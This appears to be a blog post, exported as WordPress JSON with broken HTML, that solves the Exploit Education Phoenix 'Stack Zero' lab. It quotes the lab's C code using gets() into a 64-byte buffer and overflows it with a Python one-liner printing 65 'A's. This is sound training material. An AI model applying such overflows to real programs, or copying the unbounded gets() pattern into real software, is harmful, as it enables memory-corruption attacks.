The description and source code can be found here: All binaries for the levels can be found in the \/opt\/phoenix\/amd64\/<\/span> directory. Looking at the source code on the site, it looks like we need to change the “changeme<\/strong>” variable. The “locals<\/strong>” struct is defined at the beginning of main():<\/p>\n Because of how local variables are stored on the stack, the “changeme<\/strong>” variable can potentially be overwritten if too many bytes are stored in the “buffer<\/strong>” variable. We can see that “changeme<\/strong>” is initialized to 0 and the gets()<\/span> function is used to prompt the user to fill in the “buffer<\/strong>” variable:<\/p>\n Since gets()<\/span> does not have any bounds checking, it should be possible to create a “buffer overflow” condition here. Let’s insert 65 A’s. First, I’ll use Python to generate the string. Then, I’ll copy-paste that into the program’s prompt for input:<\/p>\n Optionally, we could do this in one command:<\/p>\n This level introduces the concept that memory can be accessed outside of its allocated region, how the stack variables are laid out, and that modifying outside of the allocated memory can modify program execution … Continue readingExploit Education | Phoenix | Stack Zero Solution<\/span><\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-427","post","type-post","status-publish","format-standard","hentry","category-solutions"],"_links":{"self":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/427","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/comments?post=427"}],"version-history":[{"count":4,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/427\/revisions"}],"predecessor-version":[{"id":689,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/427\/revisions\/689"}],"wp:attachment":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/media?parent=427"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/categories?post=427"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/tags?post=427"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\nhttps:\/\/exploit.education\/phoenix\/stack-zero\/<\/a><\/p>\nstruct {\r\n char buffer[64];\r\n volatile int changeme;\r\n} locals;<\/pre>\nlocals.changeme = 0;\r\ngets(locals.buffer);<\/pre>\n
user@phoenix-amd64:\/opt\/phoenix\/amd64$ python -c 'print "A"*65'\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n\r\nuser@phoenix-amd64:\/opt\/phoenix\/amd64$ .\/stack-zero\r\nWelcome to phoenix\/stack-zero, brought to you by https:\/\/exploit.education\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nWell done, the 'changeme' variable has been changed!<\/pre>\n
user@phoenix-amd64:\/opt\/phoenix\/amd64$ python -c 'print "A"*65' | .\/stack-zero\r\nWelcome to phoenix\/stack-zero, brought to you by https:\/\/exploit.education\r\nWell done, the 'changeme' variable has been changed!<\/pre>\n","protected":false},"excerpt":{"rendered":"